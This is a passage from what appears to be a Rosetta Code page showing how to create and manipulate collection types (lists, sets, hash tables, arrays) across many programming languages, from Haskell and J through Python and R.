["beta", "delta", "zeta"]) - Output: Just [2,4,6] Data.Set[edit] Repertoire of efficient set operations: import qualified Data.Set as S setA :: S.Set String setA = S.fromList ["alpha", "beta", "gamma", "delta", "epsilon"] setB :: S.Set String setB = S.fromList ["delta", "epsilon", "zeta", "eta", "theta"] main :: IO () main = (print . S.toList) (S.intersection setA setB) - Output: ["delta","epsilon"] Icon and Unicon[edit] Icon and Unicon have a number of different types that could be considered collections. For more information see Introduction to Icon and Unicon on Rosetta - Data Types. Several data types could be considered collections: # Creation of collections: s := "abccd" # string, an ordered collection of characters, immutable c := 'abcd' # cset, an unordered collection of characters, immutable S := set() # set, an unordered collection of unique values, mutable, contents may be of any type T := table() # table, an associative array of values accessed via unordered keys, mutable, contents may be of any type L := [] # list, an ordered collection of values indexed by position 1..n or as stack/queue, mutable, contents may be of any type record constructorname(field1,field2,fieldetc) # record, a collection of values stored in named fields, mutable, contents may be of any type (declare outside procedures) R := constructorname() # record (creation) Adding to these collections can be accomplished as follows: s ||:= "xyz" # concatenation c ++:= 'xyz' # union insert(S,"abc") # insert T["abc"] := "xyz" # insert create/overwrite put(L,1) # put (extend), also push R.field1 := "xyz" # overwrite Additionally, the following operations apply: S := S ++ S2 # union of two sets or two csets S ++:= S2 # augmented assignment L := L ||| L2 # list concatenation L |||:= L2 # augmented assignment J[edit] J is an array-oriented language -- it treats all data as collections and processes collections natively. Its built in (primitive) functions are specifically designed to handle collections. J will, when possible without losing significance of the original value, implicitly convert values to a type which allows them represented in a homogeneous fashion in a collection. Heterogeneous collections are possible via "boxing" (analogous to a "variant" data type). c =: 0 10 20 30 40 NB. A collection c, 50 NB. Append 50 to the collection 0 10 20 30 40 50 _20 _10 , c NB. Prepend _20 _10 to the collection _20 _10 0 10 20 30 40 ,~ c NB. Self-append 0 10 20 30 40 0 10 20 30 40 ,:~ c NB. Duplicate 0 10 20 30 40 0 10 20 30 40 30 e. c NB. Is 30 in the collection? 1 30 i.~c NB. Where? 3 30 80 e. c NB. Don't change anything to test multiple values -- collections are native. 1 0 2 1 4 2 { c NB. From the collection, give me items two, one, four, and two again. 20 10 40 20 |.c NB. Reverse the collection 40 30 20 10 0 1+c NB. Increment the collection 1 11 21 31 41 c%10 NB. Decimate the collection (divide by 10) 0 1 2 3 4 {. c NB. Give me the first item 0 {: c NB. And the last 40 3{.c NB. Give me the first 3 items 0 10 20 3}.c NB. Throw away the first 3 items 30 40 _3{.c NB. Give me the last 3 items 20 30 40 _3}.c NB. (Guess) 0 10 keys_map_ =: 'one';'two';'three' vals_map_ =: 'alpha';'beta';'gamma' lookup_map_ =: a:& $: : (dyad def ' (keys i. y) { vals,x')&boxopen exists_map_ =: verb def 'y e. keys'&boxopen exists_map_ 'bad key' 0 exists_map_ 'two';'bad key' 1 0 lookup_map_ 'one' +-----+ |alpha| +-----+ lookup_map_ 'three';'one';'two';'one' +-----+-----+----+-----+ |gamma|alpha|beta|alpha| +-----+-----+----+-----+ lookup_map_ 'bad key' ++ || ++ 'some other default' lookup_map_ 'bad key' +------------------+ |some other default| +------------------+ 'some other default' lookup_map_ 'two';'bad key' +----+------------------+ |beta|some other default| +----+------------------+ +/ c NB. Sum of collection 100 */ c NB. Product of collection 0 i.5 NB. Generate the first 5 nonnegative integers 0 1 2 3 4 10*i.5 NB. Looks familiar 0 10 20 30 40 c = 10*i.5 NB. Test each for equality 1 1 1 1 1 c -: 10 i.5 NB. Test for identicality 1 Java[edit] Native collection library[edit] When creating a List of any kind in Java (Arraylist or LinkedList), the type of the variable is a style choice. It is sometimes considered good practice to make the pointer of type List and the new object of a List subclass. Doing this will ensure two things: if you need to change the type of list you want you only need to change one line and all of your methods will still work, and you will not be able to use any methods that are specific to the List type you chose. So in this example, all instances of "ArrayList" can be changed to "LinkedList" and it will still work, but you will not be able to use a method like "ensureCapactiy()" because the variable is of type List. List arrayList = new ArrayList(); arrayList.add(new Integer(0)); // alternative with primitive autoboxed to an Integer object automatically arrayList.add(0); //other features of ArrayList //define the type in the arraylist, you can substitute a proprietary class in the "<>" List<Integer> myarrlist = new ArrayList<Integer>(); //add several values to the arraylist to be summed later int sum; for(int i = 0; i < 10; i++) { myarrlist.add(i); } //loop through myarrlist to sum each entry for ( i = 0; i < myarrlist.size(); i++) { sum += myarrlist.get(i); } or for(int i : myarrlist) { sum += i; } //remove the last entry in the ArrayList myarrlist.remove(myarrlist.size()-1) //clear the ArrayList myarrlist.clear(); Here is a reference table for characteristics of commonly used Collections classes: Using the Scala collection classes[edit]The Scala libraries are valid Java byte-code libraries. The collection part of these are rich because the multiple inheritance by traits. E.g. an ArrayBuffer has properties inherent of 9 traits such as Buffer[A], IndexedSeqOptimized[A, ArrayBuffer[A]], Builder[A, ArrayBuffer[A]], ResizableArray[A] and Serializable. Another collection e.g. TrieMap uses some of these and other added traits. A TrieMap -a hashmap- is the most advanced of all. It supports parallel processing without blocking. import scala.Tuple2; import scala.collection.concurrent.TrieMap; import scala.collection.immutable.HashSet; import scala.collection.mutable.ArrayBuffer; public class Collections { public static void main(String[] args) { ArrayBuffer<Integer> myarrlist = new ArrayBuffer<Integer>(); ArrayBuffer<Integer> myarrlist2 = new ArrayBuffer<Integer>(20); myarrlist.$plus$eq(new Integer(42)); // $plus$eq is Scala += operator myarrlist.$plus$eq(13); // to add an element. myarrlist.$plus$eq(-1); myarrlist2 = (ArrayBuffer<Integer>) myarrlist2.$minus(-1); for (int i = 0; i < 10; i++) myarrlist2.$plus$eq(i); // loop through myarrlist to sum each entry int sum = 0; for (int i = 0; i < myarrlist2.size(); i++) { sum += myarrlist2.apply(i); } System.out.println("List is: " + myarrlist2 + " with head: " + myarrlist2.head() + " sum is: " + sum); System.out.println("Third element is: " + myarrlist2.apply$mcII$sp(2)); Tuple2<String, String> tuple = new Tuple2<String, String>("US", "Washington"); System.out.println("Tuple2 is : " + tuple); ArrayBuffer<Tuple2<String, String>> capList = new ArrayBuffer<Tuple2<String, String>>(); capList.$plus$eq(new Tuple2<String, String>("US", "Washington")); capList.$plus$eq(new Tuple2<String, String>("France", "Paris")); System.out.println(capList); TrieMap<String, String> trieMap = new TrieMap<String, String>(); trieMap.put("US", "Washington"); trieMap.put("France", "Paris"); HashSet<Character> set = new HashSet<Character>(); ArrayBuffer<Tuple2<String, String>> capBuffer = new ArrayBuffer<Tuple2<String, String>>(); trieMap.put("US", "Washington"); System.out.println(trieMap); } } JavaScript[edit] var array = []; array.push('abc'); array.push(123); array.push(new MyClass); console.log( array[2] ); var obj = {}; obj['foo'] = 'xyz'; //equivalent to: obj.foo = 'xyz'; obj['bar'] = new MyClass; //equivalent to: obj.bar = new MyClass; obj['1x; ~~:-b'] = 'text'; //no equivalent console.log(obj['1x; ~~:-b']); jq[edit] jq has three native collection types: JSON objects (implemented as hash tables over strings), arrays (with index origin equal to 0), and JSON strings. Since strings in jq can be thought of as arrays of codepoints, this article will focus on objects and arrays. Creation[edit] Collections can be created using JSON syntax (e.g. {"a":1}) or programmatically (e.g. {} | .a = 1). One of the programmatic approaches to creating JSON objects allows the key names to be specified as unquoted strings, e.g. {"a": 1} == {a: 1} evaluates to true. Variables can also be used, e.g. the object {"a":1} can also be created by the following pipeline: "a" as $key | 1 as $value | {($key): $value} Equality[edit] Two arrays are equal if and only if their lengths and respective elements are equal. Two objects are equal if and only if they have the same keys and if the values at corresponding keys are equal. Note that expressions with repeated keys are regarded as programmatic expressions: e.g. {"a":1, "a":2} is regarded as shorthand for {"a":1} + {"a":2}, which evaluates to {"a":2}. That is, "{"a":1, "a":2}" should be regarded as an expression that evaluates to a JSON object. Immutability[edit] Semantically, all jq data types are immutable, but it is often convenient to speak about modifying an element of a composite structure. For example, consider the following pipeline: [0,1,2] | .[0] = 10 The result (or output) of this sequence is [10,1,2], so it is convenient to speak of the operation ".[0] = 10" as simply a filter that sets the element at 0 to 10. Julia[edit] Julia has a wide variety of collections, including vectors, matrices, lists of Any data type, associative arrays, and bitsets. There is a slicing notation and list comprehensions similar to those in Python, but the base index is by default 1, not 0. In Julia, a collection is a just variable length array: julia> collection = [] 0-element Array{Any,1} julia> push!(collection, 1,2,4,7) 4-element Array{Any,1}: 1 2 4 7 Kotlin[edit] Apart from arrays whose length is immutable but content mutable, Kotlin distinguishes between mutable and immutable collection types in its standard library. Examples of each are given below. Where possible, the type parameter(s) of generic collection types are inferred from the content. In addition, Kotlin can also access other types of Java collection such as LinkedList, Queue, Deque and Stack by simply importing the appropriate type: import java.util.PriorityQueue fun main(args: Array<String>) { // generic array val ga = arrayOf(1, 2, 3) println(ga.joinToString(prefix = "[", postfix = "]")) // specialized array (one for each primitive type) val da = doubleArrayOf(4.0, 5.0, 6.0) println(da.joinToString(prefix = "[", postfix = "]")) // immutable list val li = listOf<Byte>(7, 8, 9) println(li) // mutable list val ml = mutableListOf<Short>() ml.add(10); ml.add(11); ml.add(12) println(ml) // immutable map val hm = mapOf('a' to 97, 'b' to 98, 'c' to 99) println(hm) // mutable map val mm = mutableMapOf<Char, Int>() mm.put('d', 100); mm.put('e', 101); mm.put('f', 102) println(mm) // immutable set (duplicates not allowed) val se = setOf(1, 2, 3) println(se) // mutable set (duplicates not allowed) val ms = mutableSetOf<Long>() ms.add(4L); ms.add(5L); ms.add(6L) println(ms) // priority queue (imported from Java) val pq = PriorityQueue<String>() pq.add("First"); pq.add("Second"); pq.add("Third") println(pq) } - Output: [1, 2, 3] [4.0, 5.0, 6.0] [7, 8, 9] [10, 11, 12] {a=97, b=98, c=99} {d=100, e=101, f=102} [1, 2, 3] [4, 5, 6] [First, Second, Third] Lingo[edit] Lingo has 2 collection types: lists (arrays) and property lists (hashes): -- list stuff l = [1, 2] l.add(3) l.add(4) put l -- [1, 2, 3, 4] -- property list stuff pl = [#foo: 1, #bar: 2] pl[#foobar] = 3 pl["barfoo"] = 4 put pl -- [#foo: 1, #bar: 2, #foobar: 3, "barfoo": 4] Lingo is not statically-typed, but if needed, a collection type that only accepts a specific data type can be created by sub-classing one of the 2 available collection types and overwriting its access methods, so that those block any data type other than the one that was passed to the constructor. Lisaac[edit] vector[edit] + vector : ARRAY[INTEGER]; vector := ARRAY[INTEGER].create_with_capacity 32 lower 0; vector.add_last 1; vector.add_last 2; hashed set[edit] + set : HASHED_SET[INTEGER]; set := HASHED_SET[INTEGER].create; set.add 1; set.add 2; linked list[edit] + list : LINKED_LIST[INTEGER]; list := LINKED_LIST[INTEGER].create; list.add_last 1; list.add_last 2; hashed dictionary[edit] + dict : HASHED_DICTIONARY[INTEGER/*value*/, STRING_CONSTANT/*key*/]; dict := HASHED_DICTIONARY[INTEGER, STRING_CONSTANT].create; dict.put 1 to "one"; dict.put 2 to "two"; Logo[edit] Logo has a list-like protocol (first, butfirst, etc.) which works on three different data types: - members of a list: [one two three] - items in an array: {one two three} - characters in a word: "123 Lua[edit] Lua has only one type of collection, the table. But Lua's table has features of both, traditional arrays and hash maps (dictionaries). You can even mix both within one table. Note, that the numeric indices of Lua's table start at 1, not at 0 as with most other languages. collection = {0, '1'} print(collection[1]) -- prints 0 collection = {["foo"] = 0, ["bar"] = '1'} -- a collection of key/value pairs print(collection["foo"]) -- prints 0 print(collection.foo) -- syntactic sugar, also prints 0 collection = {0, '1', ["foo"] = 0, ["bar"] = '1'} It is idiomatic in Lua to represent a Set data structure with a table of keys to the true value. Maple[edit] Defining lists: L1 := [3, 4, 5, 6]; L1 := [3, 4, 5, 6] L2 := [7, 8, 9]; L2 := [7, 8, 9] Concatenating two lists: [op(L1), op(L2)] [3, 4, 5, 6, 7, 8, 9] Defining an Array: A1 := Array([3, 4, 5, 6]); A1 := [3, 4, 5, 6] Appending to a Vector: ArrayTools:-Append(A1, 7); A1 := [3, 4, 5, 6, 7] Mathematica / Wolfram Language[edit] Lst = {3, 4, 5, 6} ->{3, 4, 5, 6} PrependTo[ Lst, 2] ->{2, 3, 4, 5, 6} PrependTo[ Lst, 1] ->{1, 2, 3, 4, 5, 6} Lst ->{1, 2, 3, 4, 5, 6} Insert[ Lst, X, 4] ->{1, 2, 3, X, 4, 5, 6} MATLAB / Octave[edit] MATLAB cell-arrays perform this function. They are indexed like arrays, but are able to hold any data type. In any cell simultaneously with any other data type. In essence they cell-arrays are sets. Sample Usage: >> A = {2,'TPS Report'} %Declare cell-array and initialize A = [2] 'TPS Report' >> A{2} = struct('make','honda','year',2003) A = [2] [1x1 struct] >> A{3} = {3,'HOVA'} %Create and assign A{3} A = [2] [1x1 struct] {1x2 cell} >> A{2} %Get A{2} ans = make: 'honda' year: 2003 Bold text NetRexx[edit] NetRexx can take advantage of Java's Collection classes. This example uses the Set interface backed by a HashSet: /* NetRexx */ options replace format comments java crossref symbols nobinary myVals = [ 'zero', 'one', 'two', 'three', 'four', 'five' ] mySet = Set mySet = HashSet() loop val over myVals mySet.add(val) end val loop val over mySet say val end val return Nim[edit] Array[edit] Length is known at compile time var a = [1,2,3,4,5,6,7,8,9] var b: array[128, int] b[9] = 10 b[0..8] = a var c: array['a'..'d', float] = [1.0, 1.1, 1.2, 1.3] c['b'] = 10000 Seq[edit] Variable length sequences var d = @[1,2,3,5,6,7,8,9] d.add(10) d.add([11,12,13,14]) d[0] = 0 var e: seq[float] = @[] e.add(15.5) var f = newSeq[string]() f.add("foo") f.add("bar") Tuple[edit] Fixed length, named var g = (13, 13, 14) g[0] = 12 var h: tuple[key: string, val: int] = ("foo", 100) # A sequence of key-val tuples: var i = {"foo": 12, "bar": 13} Set[edit] Bit vector of ordinals var j: set[char] j.incl('X') var k = {'a'..'z', '0'..'9'} j = j + k Tables[edit] Hash tables (there are also ordered hash tables and counting hash tables) import tables var l = initTable[string, int]() l["foo"] = 12 l["bar"] = 13 var m = {"foo": 12, "bar": 13}.toTable m["baz"] = 14 Sets[edit] Hash sets (also ordered hash sets) import sets var n = initSet[string]() n.incl("foo") var o = ["foo", "bar", "baz"].toSet o.incl("foobar") Queues[edit] import queues var p = initQueue[int]() p.add(12) p.add(13) Objeck[edit] vector[edit] values := IntVector->New(); values->AddBack(7); values->AddBack(3); values->AddBack(10); linked list[edit] values := IntList->New(); values->AddBack(7); values->AddBack(3); values->AddBack(10); hash[edit] values := StringHash->New(); values->Insert("seven", IntHolder->New(7)); values->Insert("three", IntHolder->New(3)); values->Insert("ten", IntHolder->New(10)); stack[edit] values := IntStack->New(); values->Push(7); values->Push(3); values->Push(10); Objective-C[edit] OpenStep (and derivates like GNUstep and Cocoa) has several collection classes; here we show - a set: a collection of unique elements (like mathematical set). Possible operations on a set are not shown; - a counted set (also known as bag): each elements have a counter that says how many time that element appears; - a dictionary: pairs key-value. Arrays (indexed by an integer), which are also collections, are not shown here. #import <Foundation/Foundation.h> void show_collection(id coll) { for ( id el in coll ) { if ( [coll isKindOfClass: [NSCountedSet class]] ) { NSLog(@"%@ appears %lu times", el, [coll countForObject: el]); } else if ( [coll isKindOfClass: [NSDictionary class]] ) { NSLog(@"%@ -> %@", el, coll[el]); } else { NSLog(@"%@", el); } } printf("\n"); } int main() { @autoreleasepool { // create an empty set NSMutableSet *set = [[NSMutableSet alloc] init]; // populate it [set addObject: @"one"]; [set addObject: @10]; [set addObjectsFromArray: @[@"one", @20, @10, @"two"] ]; // let's show it show_collection(set); // create an empty counted set (a bag) NSCountedSet *cset = [[NSCountedSet alloc] init]; // populate it [cset addObject: @"one"]; [cset addObject: @"one"]; [cset addObject: @"two"]; // show it show_collection(cset); // create a dictionary NSMutableDictionary *dict = [[NSMutableDictionary alloc] init]; // populate it dict[@"four"] = @4; dict[@"eight"] = @8; // show it show_collection(dict); } return EXIT_SUCCESS; } - Output: two 20 10 one two appears 1 times one appears 2 times eight -> 8 four -> 4 OCaml[edit] Lists are written like so: [1; 2; 3; 4; 5] To prepend a single element to a list, use the :: operator: 1 :: [2; 3; 4; 5] To concatenate two lists, use @: [1; 2] @ [3; 4; 5] To concatenate a whole list of lists, use List.flatten: # List.flatten [[1; 2]; [3; 4]; [5; 6; 7]] ;; - : int list = [1; 2; 3; 4; 5; 6; 7] Being a functional programming language, the list is one of the most important collection type. And being an impure functional programming language there are also imperative collection type, as for example, arrays: [| 1; 2; 3; 4; 5 |] The extlib also provides a type Enum.t. Oforth[edit] Collection is a class. Into the lang package, subclasses are : Buffer A collection of bytes Mem A mutable collection of bytes Interval A first value, a last value and a step. Pair A collection of 2 elements (with key/value features). List A collection of n elements ListBuffer A mutable collection of n elements that can grow when necessary String A collection of n characters Symbol A collection of n characters that are identity (if they are equal, they are the same object). StringBuffer A mutable collection of n charaters that can grow when necessary There is no Array collection : an immutable array is a list (which is immutable) an a mutable array is a ListBuffer. A List (or a Pair) can be created using the following syntax : [ 1, 1.2, "abcd", [ 1, 2, 3 ] ] In order to add values to a collection, you have to use a ListBuffer (a mutable collection) : ListBuffer new dup add(10) dup add("aaa") dup add(Date now) dup add(1.3) println - Output: [10, aaa, 2015-02-02 14:02:17,047, 1.3] ooRexx[edit] ooRexx has multiple classes that are collections of other objects with different access and storage characteristics. - Arrays ooRexx arrays are sequential lists of object references. The index values are the numeric position (1-based) within the array. A given array may be sparse and arrays will be automatically expanded as needed. a = .array~new(4) -- creates an array of 4 items, with all slots empty say a~size a~items -- size is 4, but there are 0 items a[1] = "Fred" -- assigns a value to the first item a[5] = "Mike" -- assigns a value to the fifth slot, expanding the size say a~size a~items -- size is now 5, with 2 items - Lists Lists are non-sparse sequential lists of object references. Item can be inserted or deleted at any position and the positions will be adjusted accordingly. Lists are indexed using index cookies that are assigned when an entry is added to the list and can be used to access entries or traverse through the list. l = .list~new -- lists have no inherent size index = l~insert('123') -- adds an item to this list, returning the index l~insert('Fred', .nil) -- inserts this at the beginning l~insert('Mike') -- adds this to the end l~insert('Rick', index) -- inserts this after '123' l[index] = l[index] + 1 -- the original item is now '124' do item over l -- iterate over the items, displaying them in order say item end - Output: Fred 124 Rick Mike - Queues Queues are non-sparse sequential lists of object references. The index values are by numeric position (1-based), although access to items is traditionally done by pushing or popping objects. q = .queue~of(2,4,6) -- creates a queue containing 3 items say q[1] q[3] -- displays "2 6" i = q~pull -- removes the first item q~queue(i) -- adds it to the end say q[1] q[3] -- displays "4 2" q[1] = q[1] + 1 -- updates the first item say q[1] q[3] -- displays "5 2" - Tables Tables are collections that create a one-to-one relationship between an index object and a referenced object. Although frequently used with string indexes, the index object can be of any class, with index identity determined by the "==" method. t = .table~new t['abc'] = 1 t['def'] = 2 say t['abc'] t['def'] -- displays "1 2" - Relations Relation collections create one-to-many data relationships. An addition to the collection will always create a new entry. t = .table~new -- a table example to demonstrate the difference t['abc'] = 1 -- sets an item at index 'abc' t['abc'] = 2 -- updates that item say t~items t['abc'] -- displays "1 2" r = .relation~new r['abc'] = 1 -- sets an item at index 'abc' r['abc'] = 2 -- adds an additional item at the same index say r~items r['abc'] -- displays "2 2" this has two items in it now do item over r~allAt('abc') -- retrieves all items at the index 'abc' say item end - Directories Directory objects are like tables, but the index values must always be string objects. d = .directory~new d['abc'] = 1 d['def'] = 2 say d['abc'] d['def'] -- displays "1 2" Directory objects also support an UNKNOWN method that map messages to directory index entries. This allows values to be set as if they were object attributes. The following example is another way of doing the same as the first example: d = .directory~new d~abc = 1 d~def = 2 say d~abc d~def -- displays "1 2" Note that the index entries created in the example are the uppercase 'ABC' and 'DEF'. - Sets Sets are unordered collections where the items added to the collection are unique values. Duplicate additions are collapsed to just a single item. Sets are useful for collecting unique occurrences of items. s = .set~new text = "the quick brown fox jumped over the lazy dog" do word over text~makearray(' ') s~put(word) end say "text has" text~words", but only" s~items "unique words" Oz[edit] The most important collection types are lists, records, dictionaries and arrays: declare %% Lists (immutable, recursive) Xs = [1 2 3 4] %% Add element at the front (cons) Xs0 = 0|Xs {Show {Length Xs}} %% output: 4 %% Records (immutable maps with a label) Rec = label(1:2 symbol:3) {Show Rec} %% output: label(2 symbol:3) {Show Rec.1} %% output: 2 %% create a new record with an added field Rec2 = {AdjoinAt Rec 2 value} {Show Rec2} %% output: label(2 value symbol:3) %% Dictionaries (mutable maps) Dict = {Dictionary.new} Dict.1 := 1 Dict.symbol := 3 {Show Dict.1} %% output: 1 %% Arrays (mutable with integer keys) Arr = {Array.new 1 10 initValue} Arr.1 := 3 {Show Arr.1} %% output: 3 There are also tuples (records with consecutive integer keys starting with 1), weak dictionaries, queues and stacks. PARI/GP[edit] Pari has vectors, column vectors, matrices, sets, lists, small vectors, and maps. v = vector(0); v = []; cv = vectorv(0); cv = []~; m = matrix(1,1); s = Set(v); l = List(v); vs = vectorsmall(0); M = Map() Adding members: listput(l, "hello world") v=concat(v, [1,2,3]); v=concat(v, 4); mapput(M, "key", "value"); Pascal[edit] Different implementations of Pascal have various containers. Array[edit] var MyArray: array[1..5] of real; begin MyArray[1] := 4.35; end; Dynamic Array[edit] var MyArray: array of integer; begin setlength (MyArray, 10); MyArray[4] := 99; end; Record[edit] var MyRecord: record x, y, z: real; presence: boolean; end; begin MyRecord.x := 0.3; MyRecord.y := 3.2; MyRecord.z := -4.0; MyRecord.presence := true; end; Set[edit] type days = (Mon, Tue, Wed, Thu, Fri, Sat, Sun); var workDays, week, weekendDays: set of days; begin workdays := [Mon, Tue, Wed, Thu, Fri]; week := workdays + [Sat, Sun]; weekendDays := week - workdays; end; String[edit] var MyString: String; begin MyString:= 'Some Text'; end; List[edit] program ListDemo; uses classes; var MyList: TList; a, b, c: integer; i: integer; begin a := 1; b := 2; c := 3; MyList := TList.Create; MyList.Add(@a); MyList.Add(@c); MyList.Insert(1, @b); for i := MyList.IndexOf(MyList.First) to MyList.IndexOf(MyList.Last) do writeln (integer(MyList.Items[i]^)); MyList.Destroy; end. - Output: % ./ListDemo 1 2 3 Collection[edit] Example from the documentation of the FreePascal runtime library. Program ex34; { Program to demonstrate the TCollection.AtInsert method } Uses Objects, MyObject; { For TMyObject definition and registration } Var C : PCollection; M : PMyObject; I : Longint; Procedure PrintField (Dummy : Pointer; P : PMyObject); begin Writeln ('Field : ',P^.GetField); end; begin Randomize; C:=New(PCollection, Init(120, 10)); Writeln ('Inserting 100 records at random places.'); For I:=1 to 100 do begin M:=New(PMyObject, Init); M^.SetField(I-1); If I=1 then C^.Insert(M) else With C^ do AtInsert(Random(Count), M); end; Writeln ('Values : '); C^.Foreach(@PrintField); Dispose(C, Done); end. Perl[edit] Perl has array and hashes. use strict; my @c = (); # create an empty "array" collection # fill it push @c, 10, 11, 12; push @c, 65; # print it print join(" ",@c) . "\n"; # create an empty hash my %h = (); # add some pair $h{'one'} = 1; $h{'two'} = 2; # print it foreach my $i ( keys %h ) { print $i . " -> " . $h{$i} . "\n"; } Perl 6[edit] Perl 6 has both mutable and immutable containers of various sorts. Here are some of the most common ones: Mutable[edit] # Array my @array = 1,2,3; @array.push: 4,5,6; # Hash my %hash = 'a' => 1, 'b' => 2; %hash<c d> = 3,4; %hash.push: 'e' => 5, 'f' => 6; # SetHash my $s = SetHash.new: <a b c>; $s ∪= <d e f>; # BagHash my $b = BagHash.new: <b a k l a v a>; $b ⊎= <a b c>; Immutable[edit] # List my @list := 1,2,3; my @newlist := |@list, 4,5,6; # |@list will slip @list into the surrounding list instead of creating a list of lists # Set my $set = set <a b c>; my $newset = $set ∪ <d e f>; # Bag my $bag = bag <b a k l a v a>; my $newbag = $bag ⊎ <b e e f>; Pair list (cons list)[edit] my $tail = d => e => f => Nil; my $new = a => b => c => $tail; P6opaque object (immutable in structure)[edit] class Something { has $.foo; has $.bar }; my $obj = Something.new: foo => 1, bar => 2; my $newobj = $obj but role { has $.baz = 3 } # anonymous mixin Phix[edit] Collections can simply be stored as sequences sequence collection = {} collection = append(collection,"one") collection = prepend(collection,2) ? collection -- {2,"one"} If you want uniqueness, you could simply use a dictionary with values of 0: setd("one",0) setd(2,0) function visitor(object key, object /*data*/, object /*user_data*/) ?key return 1 end function traverse_dict(routine_id("visitor")) -- shows 2, "one" PHP[edit] PHP has associative arrays as collection <?php $a = array(); # add elements "at the end" array_push($a, 55, 10, 20); print_r($a); # using an explicit key $a['one'] = 1; $a['two'] = 2; print_r($a); ?> - Output: Array ( [0] => 55 [1] => 10 [2] => 20 ) Array ( [0] => 55 [1] => 10 [2] => 20 [one] => 1 [two] => 2 ) PicoLisp[edit] The direct way in PicoLisp is a linear list (other possibilities could involve index trees or property lists). : (setq Lst (3 4 5 6)) -> (3 4 5 6) : (push 'Lst 2) -> 2 : (push 'Lst 1) -> 1 : Lst -> (1 2 3 4 5 6) : (insert 4 Lst 'X) -> (1 2 3 X 4 5 6) PL/I[edit] declare countries character (20) varying controlled; allocate countries initial ('Britain'); allocate countries initial ('America'); allocate countries initial ('Argentina'); PowerShell[edit] The most common collection types in PowerShell are arrays and hash tables. Array[edit] The array index is zero based. # Create an Array by separating the elements with commas: $array = "one", 2, "three", 4 # Using explicit syntax: $array = @("one", 2, "three", 4) # Send the values back into individual variables: $var1, $var2, $var3, $var4 = $array # An array of several integer ([int]) values: $array = 0, 1, 2, 3, 4, 5, 6, 7 # Using the range operator (..): $array = 0..7 # Strongly typed: [int[]] $stronglyTypedArray = 1, 2, 4, 8, 16, 32, 64, 128 # An empty array: $array = @() # An array with a single element: $array = @("one") # I suppose this would be a jagged array: $jaggedArray = @((11, 12, 13), (21, 22, 23), (31, 32, 33)) $jaggedArray | Format-Wide {$_} -Column 3 -Force $jaggedArray[1][1] # returns 22 # A Multi-dimensional array: $multiArray = New-Object -TypeName "System.Object[,]" -ArgumentList 6,6 for ($i = 0; $i -lt 6; $i++) { for ($j = 0; $j -lt 6; $j++) { $multiArray[$i,$j] = ($i + 1) * 10 + ($j + 1) } } $multiArray | Format-Wide {$_} -Column 6 -Force $multiArray[2,2] # returns 33 Hash Table[edit] Hash tables come in two varieties: normal and ordered, where of course, the order of entry is retained. # An empty Hash Table: $hash = @{} # A Hash table populated with some values: $nfcCentralDivision = @{ Packers = "Green Bay" Bears = "Chicago" Lions = "Detroit" } # Add items to a Hash Table: $nfcCentralDivision.Add("Vikings","Minnesota") $nfcCentralDivision.Add("Buccaneers","Tampa Bay") # Remove an item from a Hash Table: $nfcCentralDivision.Remove("Buccaneers") # Searching for items $nfcCentralDivision.ContainsKey("Packers") $nfcCentralDivision.ContainsValue("Green Bay") # A bad value... $hash1 = @{ One = 1 Two = 3 } # Edit an item in a Hash Table: $hash1.Set_Item("Two",2) # Combine Hash Tables: $hash2 = @{ Three = 3 Four = 4 } $hash1 + $hash2 # Using the ([ordered]) accelerator the items in the Hash Table retain the order in which they were input: $nfcCentralDivision = [ordered]@{ Bears = "Chicago" Lions = "Detroit" Packers = "Green Bay" Vikings = "Minnesota" } Other Collection Types[edit] PowerShell is a .NET language so all of the collection types in .NET are available to PowerShell. The most commonly used would probably be [System.Collections.ArrayList]. $list = New-Object -TypeName System.Collections.ArrayList -ArgumentList 1,2,3 # or... $list = [System.Collections.ArrayList]@(1,2,3) $list.Add(4) | Out-Null $list.RemoveAt(2) PureBasic[edit] Arrays[edit] Creating an Array of 10 strings (could be any type). PureBasic starts the index with element 0. Dim Text.s(9) Text(3)="Hello" Text(7)="World!" Linked Lists[edit] Create a Linked List for strings (could be any type), then add two elements. NewList Cars.s() AddElement(Cars()): Cars()="Volvo" AddElement(Cars()): Cars()="BMV" Hash table[edit] Create a Map, e.g. a hash table that could be any type. The size of the dictionary can be defined as needed, otherwise a default value is used. NewMap Capitals.s() Capitals("USA") = "Washington" Capitals("Sweden")= "Stockholm" Python[edit] Python supports lists, tuples, dictionaries and now sets as built-in collection types. See for further details. collection = [0, '1'] # Lists are mutable (editable) and can be sorted in place x = collection[0] # accessing an item (which happens to be a numeric 0 (zero) collection.append(2) # adding something to the end of the list collection.insert(0, '-1') # inserting a value into the beginning y = collection[0] # now returns a string of "-1" collection.extend([2,'3']) # same as [collection.append(i) for i in [2,'3']] ... but faster collection += [2,'3'] # same as previous line collection[2:6] # a "slice" (collection of the list elements from the third up to but not including the sixth) len(collection) # get the length of (number of elements in) the collection collection = (0, 1) # Tuples are immutable (not editable) collection[:] # ... slices work on these too; and this is equivalent to collection[0:len(collection)] collection[-4:-1] # negative slices count from the end of the string collection[::2] # slices can also specify a stride --- this returns all even elements of the collection collection="some string" # strings are treated as sequences of characters x = collection[::-1] # slice with negative step returns reversed sequence (string in this case). collection[::2] == "some string"[::2] # True, literal objects don't need to be bound to name/variable to access slices or object methods collection.__getitem__(slice(0,len(collection),2)) # same as previous expressions. collection = {0: "zero", 1: "one"} # Dictionaries (Hash) collection['zero'] = 2 # Dictionary members accessed using same syntax as list/array indexes. collection = set([0, '1']) # sets (Hash) In addition Python classes support a number of methods allowing them to implement indexing, slicing, and attribute management features as collections. Thus many modules in the Python standard libraries allow one to treat files contents, databases, and other data using the same syntax as the native collection types. Some Python modules (such as Numeric and NumPy) provide low-level implementations of additional collections (such as efficient n-dimensional arrays). R[edit] R has several types that can be considered collections. Vectors[edit] Numeric (floating point) numeric(5) 1:10 c(1, 3, 6, 10, 7 + 8, sqrt(441)) [1] 0 0 0 0 0 [1] 1 2 3 4 5 6 7 8 9 10 [1] 1 3 6 10 15 21 Integer integer(5) c(1L, -2L, 99L); [1] 0 0 0 0 0 [1] 1 -2 99 Logical logical(5) c(TRUE, FALSE) [1] FALSE FALSE FALSE FALSE FALSE [1] TRUE FALSE Character character(5) c("abc", "defg", "") [1] "" "" "" "" "" [1] "abc" "defg" "" Arrays and Matrices[edit] These are essentially vectors with a dimension attribute. Matrices are just arrays with two dimensions (and a different class). matrix(1:12, nrow=3) array(1:24, dim=c(2,3,4)) #output not shown [,1] [,2] [,3] [,4] [1,] 1 4 7 10 [2,] 2 5 8 11 [3,] 3 6 9 12 Lists[edit] Lists are collections of other variables (that can include other lists). list(a=123, b="abc", TRUE, 1:5, c=list(d=runif(5), 